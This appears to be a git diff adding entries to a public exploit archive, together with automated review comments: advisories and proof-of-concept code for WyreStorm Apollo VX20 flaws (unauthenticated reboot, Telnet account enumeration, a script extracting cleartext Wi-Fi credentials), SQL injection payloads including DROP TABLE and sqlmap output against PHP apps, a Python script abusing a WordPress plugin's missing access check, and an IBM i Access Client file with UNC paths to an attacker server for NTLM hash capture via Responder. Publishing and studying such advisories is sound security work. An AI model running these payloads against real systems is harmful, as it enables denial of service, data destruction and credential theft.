diff --git a/exploits/multiple/dos/51815.txt b/exploits/multiple/dos/51815.txt
new file mode 100644
index 0000000000..9f85b9eff6
--- /dev/null
+++ b/exploits/multiple/dos/51815.txt
@@ -0,0 +1,63 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.wyrestorm.com
+
+
+[Product]
+APOLLO VX20 < 1.3.58
+
+
+[Vulnerability Type]
+Incorrect Access Control (DOS)
+
+
+[Affected Product Code Base]
+APOLLO VX20 < 1.3.58, fixed in v1.3.58
+
+
+[Affected Component]
+Web interface, reboot and reset commands
+
+
+[CVE Reference]
+CVE-2024-25736
+
+
+[Security Issue]
+An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.
+
+
+[Exploit/POC]
+curl -k https://192.168.x.x/device/reboot
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: January 18, 2024
+Vendor released fixed firmware v1.3.58: February 2, 2024
+February 11, 2024 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/multiple/remote/51814.txt b/exploits/multiple/remote/51814.txt
new file mode 100644
index 0000000000..0f04052224
--- /dev/null
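Review bot: The [Affected Component] section names "reboot and reset commands", but the advisory only describes and demonstrates the /device/reboot endpoint; the reset command is never shown, so either drop it from the component list or add the sentence that describes it. The interim mitigation is also left implicit: before firmware 1.3.58 the only defence the text supports is restricting who can reach the device's web interface at the network layer. If the device keeps web-interface access logs, an unauthenticated GET to /device/reboot is the event a defender would look for, and a sentence saying so would make the advisory more useful to operators.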
+++ b/exploits/multiple/remote/51814.txt
@@ -0,0 +1,63 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.wyrestorm.com
+
+
+[Product]
+APOLLO VX20 < 1.3.58
+
+[Vulnerability Type]
+Account Enumeration
+
+
+[CVE Reference]
+CVE-2024-25734
+
+
+[Security Issue]
+An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.
+Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.
+
+
+[Exploit/POC]
+TELNET x.x.x.x 23
+username:aa
+username:bb
+username:admin
+password:
+
+
+[Network Access]
+Remote
+
+
+[Affected Product Code Base]
+APOLLO VX20 - < 1.3.58, fixed in v1.3.58
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: January 18, 2024
+Vendor released fixed firmware v1.3.58: February 2, 2024
+February 11, 2024 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
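Review bot: This advisory omits the [Affected Component] section that its sibling entries for the same device (51815.txt, 51816.txt) carry; adding `[Affected Component]` / `TELNET service` would keep the three Apollo VX20 advisories consistent and make the affected service searchable in the index. The [Security Issue] paragraph also runs two sentences together with a comma ("...can determine valid accounts, this can potentially allow..."); a period or semicolon reads better. The mitigation side is implied but never stated: besides upgrading to 1.3.58, disabling or network-restricting the Telnet service removes the enumeration surface, and repeated username prompts without a password prompt are the pattern a defender would watch for in the service's logs, if it keeps any.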
diff --git a/exploits/multiple/remote/51816.txt b/exploits/multiple/remote/51816.txt
new file mode 100644
index 0000000000..ab6e90bceb
--- /dev/null
+++ b/exploits/multiple/remote/51816.txt
@@ -0,0 +1,83 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.wyrestorm.com + + +[Product] +APOLLO VX20 < 1.3.58 + + +[Vulnerability Type] +Incorrect Access Control (Credentials Disclosure) + + +[Affected Component] +Web interface, config + + +[Affected Product Code Base] +APOLLO VX20 < 1.3.58, fixed in v1.3.58 + + +[CVE Reference] +CVE-2024-25735 + + +[Security Issue] +An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. +Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request. +The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config + +E.g. HTTP response snippet: + +:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"} +,"softAp":{"password":"12345678","router":"y","softAp":"y"}... + + +[Exploit/POC] +import requests + +target="https://x.x.x.x" +res = requests.get(target+"/device/config", verify=False) + +idx=res.content.find('{"password":') +if idx != -1: + idx2=res.content.find('router') + if idx2 != -1: + print("[+] CVE-2024-25735 Credentials Disclosure") + print("[+] " + res.content[idx + 1:idx2 + 11]) + print("[+] hyp3rlinx") +else: + print("[!] Apollo vX20 Device not vulnerable...") + + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: January 18, 2024 +Vendor released fixed firmware v1.3.58: February 2, 2024 +February 11, 2024 : Public Disclosure + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/php/remote/51808.txt b/exploits/php/remote/51808.txt new file mode 100644 index 0000000000..244bd1d3f6 --- /dev/null +++ b/exploits/php/remote/51808.txt 
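Review bot: The Python PoC under [Exploit/POC] is written against Python 2 string semantics — `res.content.find('{"password":')` and the later `res.content[idx + 1:idx2 + 11]` slice treat `res.content` as text, whereas under Python 3 `requests` returns `bytes` there and the `str` pattern raises `TypeError` — so the advisory should state the interpreter version it was tested with. The second lookup, `res.content.find('router')`, also searches from offset 0 rather than from `idx`, so if the substring `router` occurs earlier in the configuration document than the password object the printed slice is wrong or empty. Neither point affects the finding itself, which the curl example in [Security Issue] already demonstrates; from the defender's side, an unauthenticated GET to /device/config returning the softAp object with a cleartext `password` field is the behaviour to verify is gone after upgrading to 1.3.58.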
@@ -0,0 +1,64 @@
+# Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection
+# Google Dork: N/A
+# Application: Simple Inventory Management System
+# Date: 26.02.2024
+# Bugs: SQL Injection
+# Exploit Author: SoSPiro
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Windows 10 64 bit Wampserver
+# CVE : N/A
+
+
+## Vulnerability Description:
+
+This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.
+
+
+## Proof of Concept (PoC):
+
+An example attacker could input the following values:
+
+email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'
+pwd: test
+
+This would result in the following SQL query:
+
+SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'
+
+This attack would retrieve all users, making the login process always successful.
+
+request-response foto:https://i.imgur.com/slkzYJt.png
+
+
+## Vulnerable code section:
+====================================================
+ims/login.php
+
+login($_POST['email'], $_POST['pwd']);
+ //
+
+if(!empty($login)) {
+ $_SESSION['userid'] = $login[0]['userid'];
+ $_SESSION['name'] = $login[0]['name'];
+ header("Location:index.php");
+ } else {
+ $loginError = "Invalid email or password!";
+ }
+}
+?>
+
+
+
+## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html
\ No newline at end of file
diff --git a/exploits/php/remote/51812.txt b/exploits/php/remote/51812.txt
new file mode 100644
index 0000000000..239b24cae7
--- /dev/null
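Review bot: The PoC narrative contradicts its own payload: the value given for `email` (`'%2b(select*from(select(sleep(20)))a)%2b'`) is a time-based blind probe, yet the text concludes "This attack would retrieve all users, making the login process always successful", and the rendered query shows `password = 'anything'` while the input above it is `pwd: test`. Either describe the payload as a time-delay confirmation that the input reaches the query, or show the request/response that actually demonstrates the authentication-bypass claim. The "Vulnerable code section" also stops at the `login($_POST['email'], $_POST['pwd']);` call and never shows where the query string is built, which is the line a maintainer needs in order to confirm the sink and replace it with a prepared statement.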
+++ b/exploits/php/remote/51812.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection
+# Google Dork: N/A
+# Application: Flashcard Quiz App
+# Date: 25.02.2024
+# Bugs: SQL Injection
+# Exploit Author: SoSPiro
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Windows 10 64 bit Wampserver
+# CVE : N/A
+
+
+## Vulnerability Description:
+
+The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
+
+
+## Proof of Concept (PoC):
+
+This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.
+
+1. Original Code:
+
+$card = $_GET['card'];
+
+$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
+
+2. Payload:
+
+' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
+
+3. Injected Query:
+
+DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
+
+Request Response foto: https://i.imgur.com/5IXvpiZ.png
+
+
+## Vulnerable code section:
+====================================================
+endpoint/delete-flashcard.php
+
+$card = $_GET['card'];
+
+$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
\ No newline at end of file
diff --git a/exploits/php/remote/51813.txt b/exploits/php/remote/51813.txt
new file mode 100644
index 0000000000..7aed953e32
--- /dev/null
+++ b/exploits/php/remote/51813.txt
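Review bot: The "Injected Query" relies on a second, stacked statement after the DELETE, but the excerpt under "Vulnerable code section" shows only `$query` being built, not the call that executes it, and whether a second statement runs at all depends on that API — the common PHP MySQL interfaces execute one statement per call unless multi-statement execution is explicitly requested. Quote the execution line from endpoint/delete-flashcard.php so a reader can judge whether the sleep-based confirmation in the screenshot is reproducible as written; the unquoted `$card` interpolation is the defect either way, and the fix is a bound parameter. The same point applies to 51813.txt in this commit, whose `'; DROP TABLE tbl_faq; --` example makes the same stacked-query assumption without showing the executing call.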
@@ -0,0 +1,48 @@
+# Exploit Title: FAQ Management System v1.0 - 'faq' SQL Injection
+# Google Dork: N/A
+# Application: FAQ Management System
+# Date: 25.02.2024
+# Bugs: SQL Injection
+# Exploit Author: SoSPiro
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Windows 10 64 bit Wampserver
+# CVE : N/A
+
+
+## Vulnerability Description:
+
+The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.
+
+
+## Proof of Concept (PoC):
+
+An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:
+
+1. Original Request:
+http://example.com/endpoint/delete-faq.php?faq=123
+
+2.Malicious Request (SQL Injection):
+http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --
+
+This would result in a query like:
+
+DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --
+
+Which can lead to the deletion of data or even the entire table.
+
+
+poc foto: https://i.imgur.com/1IENYFg.png
+
+
+## Vulnerable code section:
+====================================================
+endpoint/delete-faq.php
+
+
+$faq = $_GET['faq'];
+
+// ...
+
+$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";
\ No newline at end of file
diff --git a/exploits/php/webapps/51809.py b/exploits/php/webapps/51809.py
new file mode 100755
index 0000000000..66b8ed7c58
--- /dev/null
+++ b/exploits/php/webapps/51809.py
@@ -0,0 +1,62 @@ +# Exploit Title: POC-CVE-2023-3244 +# Date: 9/12/2023 +# Exploit Author: Diaa Hanna +# Software Link: [download link if available] +# Version: <= 1.2.0 comments-like-dislike +# Tested on: 1.1.6 comments-like-dislike +# CVE : CVE-2023-3244 + +#References +#https://nvd.nist.gov/vuln/detail/CVE-2023-3244 + + +#The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin. +#This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users. +#For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244). 
+ +import requests +import argparse +import sys +from colorama import Fore + +parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ') +parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True) +parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True) +parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True) +parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False) +args=parser.parse_args() + +#check if the domain ends with a '/' if not then add it +url=args.url +if url[-1] != '/': + url+='/' + + + +wp_login = f'{url}wp-login.php' +wp_admin = f'{url}wp-admin/' +username = args.username +password = args.password + + +session=requests.Session() +#logging in +session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In', + 'redirect_to':wp_admin, 'testcookie':'1' },verify=not (args.nossl)) +#if failed to login +if len(session.cookies.get_dict()) == 2: + print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again") + sys.exit(1) + +#making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function +#the restore_settings function does not check the sufficient privileges of a logged-in user +#even a subscriber can use this POC +response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl)) + +if response.text == "Settings restored successfully.Redirecting...": + print(Fore.GREEN +"exploited excuted successfully") + print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server") + sys.exit(0) +else: + 
print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway") + sys.exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/51810.txt b/exploits/php/webapps/51810.txt new file mode 100644 index 0000000000..1545b571b0 --- /dev/null +++ b/exploits/php/webapps/51810.txt 
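Review bot: `wp_admin` is built with a trailing slash (`wp_admin = f'{url}wp-admin/'`) and the AJAX request then prepends another one (`f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action"`), so the script requests `wp-admin//admin-ajax.php`; `f"{wp_admin}admin-ajax.php?action=cld_settings_restore_action"` is what was intended. The login check `if len(session.cookies.get_dict()) == 2:` infers failure from a cookie count, which depends on the site's cookie setup rather than on the login response, and `url[-1]` raises `IndexError` when `--url` is an empty string; a `if not url.endswith('/')` guard covers both the empty and the normal case. The script also imports `colorama`, a third-party package, with no mention in the header block, so a `# requires: colorama` line would save the next user a failed run. For operators, the advisory's own description gives the detection signal: a request to admin-ajax.php with `action=cld_settings_restore_action` from a subscriber-level session on a site running the plugin.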
@@ -0,0 +1,67 @@
+# Exploit Title: taskhub 2.8.7 - SQL Injection
+# Exploit Author: CraCkEr
+# Date: 05/09/2023
+# Vendor: Infinitie Technologies
+# Vendor Homepage: https://www.infinitietech.com/
+# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
+# Demo: https://taskhub.company/auth
+# Tested on: Windows 10 Pro
+# Impact: Database Access
+# CVE: CVE-2023-4987
+# CWE: CWE-89 - CWE-74 - CWE-707
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+SQL injection attacks can allow unauthorized access to sensitive data, modification of
+data and crash the application or make it unavailable, leading to lost revenue and
+damage to a company's reputation.
+
+
+Path: /home/get_tasks_list
+
+GET parameter 'project' is vulnerable to SQL Injection
+GET parameter 'status' is vulnerable to SQL Injection
+GET parameter 'user_id' is vulnerable to SQL Injection
+GET parameter 'sort' is vulnerable to SQL Injection
+GET parameter 'search' is vulnerable to SQL Injection
+
+
+https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]
+
+
+---
+Parameter: project (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
+
+Parameter: status (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
+
+Parameter: user_id (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
+
+Parameter: sort (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=
+
+Parameter: search (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
+---
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51811.txt b/exploits/php/webapps/51811.txt
new file mode 100644
index 0000000000..5441aa6188
--- /dev/null
+++ b/exploits/php/webapps/51811.txt
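Review bot: The header gives `# CVE: CVE-2023-4987` and `# Date: 05/09/2023`, but no disclosure timeline, vendor response or fixed version is recorded, so a reader cannot tell whether 2.8.7 is the last affected release or whether the vendor has shipped a fix since. The index already carries 51692 ("Taskhub CRM Tool 2.8.6 - SQL Injection", 2023-08-21); if this is the same issue observed in a later build, a one-line cross-reference would avoid it being counted as a separate finding. The "## Description" paragraph is generic boilerplate; the substantive content is the parameter list and the five time-based payloads, so a sentence naming which application component behind `/home/get_tasks_list` builds the query, and that bound parameters are the fix, would be more useful than the general text.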
@@ -0,0 +1,75 @@
+# Exploit Title: Online Shopping System Advanced
+
+# Date: 07.12.2023
+
+# Exploit Author: Furkan Gedik
+
+# Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced
+
+# Software Link: https://github.com/PuneethReddyHC/online-shopping-system-advanced
+
+# Version: 1.0
+
+# Tested on: [Kali Linux 2020.3]
+
+
+
+
+
+
+
+# Description
+
+Unauthorized access to a database by injecting malicious SQL statements. The SQL injection vulnerability occurs due to the inclusion of the user-provided "cm" parameter in the SQL query without proper filtering or sanitization. An attacker can exploit the vulnerability by injecting malicious SQL code in the "cm" parameter. Successful exploitation of the vulnerability results in the disclosure of sensitive information from the database, such as user credentials, which can be used to gain unauthorized access to the database.
+
+
+
+# PoC
+
+
+
+[+] sqlmap output
+
+sqlmap.py -u "http://localhost/online-shopping-system-advanced/payment_success.php?st=Completed&cm=1" -p cm --dbms=mysql -technique=T --proxy=http://127.0.0.1:8080
+
+
+
+Parameter: cm (GET)
+
+ Type: time-based blind
+
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+ Payload: st=Completed&cm=1' AND (SELECT 1415 FROM (SELECT(SLEEP(5)))NRHH) AND 'jLpV'='jLpV
+
+
+
+# Vulnerability
+
+https://github.com/PuneethReddyHC/online-shopping-system-advanced/blob/master/payment_success.php#L12-L22
+
+[+] payment_success.php
+
+if (isset($_GET["st"])) {
+
+
+ # code...
+
+ $trx_id = $_GET["tx"];
+
+ $p_st = $_GET["st"];
+
+ $amt = $_GET["amt"];
+
+ $cc = $_GET["cc"];
+
+ $cm_user_id = $_GET["cm"];
+
+ $c_amt = $_COOKIE["ta"];
+
+ if ($p_st == "Completed") {
+
+
+ include_once("db.php");
+
+ $sql = "SELECT p_id,qty FROM cart WHERE user_id = '$cm_user_id'";
\ No newline at end of file
diff --git a/exploits/windows_x86-64/remote/51817.txt b/exploits/windows_x86-64/remote/51817.txt
new file mode 100644
index 0000000000..91fb700abc
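Review bot: The `# Exploit Title` line carries only the product name, while every neighbouring entry in the index uses `<product> <version> - <vulnerability type>` (the existing 48383 row is "Online shopping system advanced 1.0 - 'p' SQL Injection"); `# Exploit Title: Online Shopping System Advanced 1.0 - 'cm' SQL Injection` would match that convention and name the parameter the advisory is about. The code excerpt ends at the `$sql = "SELECT p_id,qty FROM cart WHERE user_id = '$cm_user_id'";` assignment without the line that executes it, and the `# Vulnerability` link to `payment_success.php#L12-L22` is the only pointer to the sink, so quoting the executing call keeps the advisory self-contained if the upstream file is moved or rewritten. The `# Date: 07.12.2023` header also predates the index's 2024-02-26 publication date by several months with no timeline explaining the gap.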
--- /dev/null
+++ b/exploits/windows_x86-64/remote/51817.txt
@@ -0,0 +1,96 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+[Vendor]
+www.ibm.com
+
+[Product]
+IBM i Access Client Solutions
+
+[Versions]
+All
+
+[Remediation/Fixes]
+None
+
+[Vulnerability Type]
+Remote Credential Theft
+
+[CVE Reference]
+CVE-2024-22318
+
+
+[Security Issue]
+IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.
+Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.
+If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.
+The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.
+
+
+[References]
+https://www.ibm.com/support/pages/node/7116091
+
+
+[Exploit/POC]
+The client access .HOD File vulnerable parameters:
+
+1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c
+
+[KeyRemapFile]
+2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c
+
+Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv
+
+The client access legacy .WS File vulnerable parameters:
+DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c
+
+Example, client access older .WS file
+
+[Profile]
+ID=WS
+Version=9
+[Telnet5250]
+AssociatedPrinterStartMinimized=N
+AssociatedPrinterTimeout=0
+SSLClientAuthentication=Y
+HostName=PWN
+AssociatedPrinterClose=N
+Security=CA400
+CertSelection=AUTOSELECT
+AutoReconnect=Y
+[KeepAlive]
+KeepAliveTimeOut=0
+[Keyboard]
+IBMDefaultKeyboard=N
+DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
+[Communication]
+Link=telnet5250
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: December 14, 2023
+Vendor Addresses Issue: February 7, 2024
+February 8, 2024 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 74b8436999..90c9235953 100644
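Review bot: `[Remediation/Fixes]` says `None`, but the timeline records "Vendor Addresses Issue: February 7, 2024" and [References] links the IBM support page, so the two sections disagree; either state what IBM's note provides (a fix, configuration guidance, or only an acknowledgement) or reword the timeline entry. The `[Versions]` value `All` is likewise unqualified by the ACS build the .HOD/.WS profiles were tested against, which matters for anyone checking whether a later release behaves differently. On the defensive side the advisory already identifies the preconditions — NTLM enabled, and a UNC path inside a user-supplied profile file — which point to the standard mitigations worth stating explicitly: block outbound SMB from workstations to untrusted networks, restrict NTLM via policy where the environment allows, and treat received .HOD/.WS files as untrusted input rather than opening them directly.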
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10317,6 +10317,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15707,exploits/multiple/dos/15707.txt,"WonderWare InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",dos,multiple,,2010-12-08,2010-12-15,0,CVE-2010-4557;OSVDB-69936,,udpsz.zip,,,http://aluigi.org/adv/inbatch_1-adv.txt
 33099,exploits/multiple/dos/33099.txt,"World in Conflict 1.0.1 - Typecheck Remote Denial of Service",2009-06-16,"Luigi Auriemma",dos,multiple,,2009-06-16,2014-05-01,1,,,,,,https://www.securityfocus.com/bid/35751/info
 31957,exploits/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",dos,multiple,,2008-06-23,2014-03-03,1,CVE-2008-6713;OSVDB-46533,,,,,https://www.securityfocus.com/bid/29888/info
+51815,exploits/multiple/dos/51815.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS'",2024-02-26,hyp3rlinx,dos,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25736,,,,,
 26145,exploits/multiple/dos/26145.c,"Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service",2005-08-10,"Piotr Chytla",dos,multiple,,2005-08-10,2013-06-13,1,CVE-2005-2577;OSVDB-18698,,,,,https://www.securityfocus.com/bid/14536/info
 5152,exploits/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,dos,multiple,,2008-02-18,,1,CVE-2007-5958,,,,,
 25393,exploits/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",dos,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1078;OSVDB-15636,,,,,https://www.securityfocus.com/bid/13131/info
@@ -11547,6 +11548,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple,,1999-12-09,2017-11-15,1,CVE-1999-0972;OSVDB-1158,,,,,https://www.securityfocus.com/bid/863/info
 32987,exploits/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple,,2009-05-05,2014-04-23,1,CVE-2009-1554;OSVDB-54220,,,,,https://www.securityfocus.com/bid/34829/info
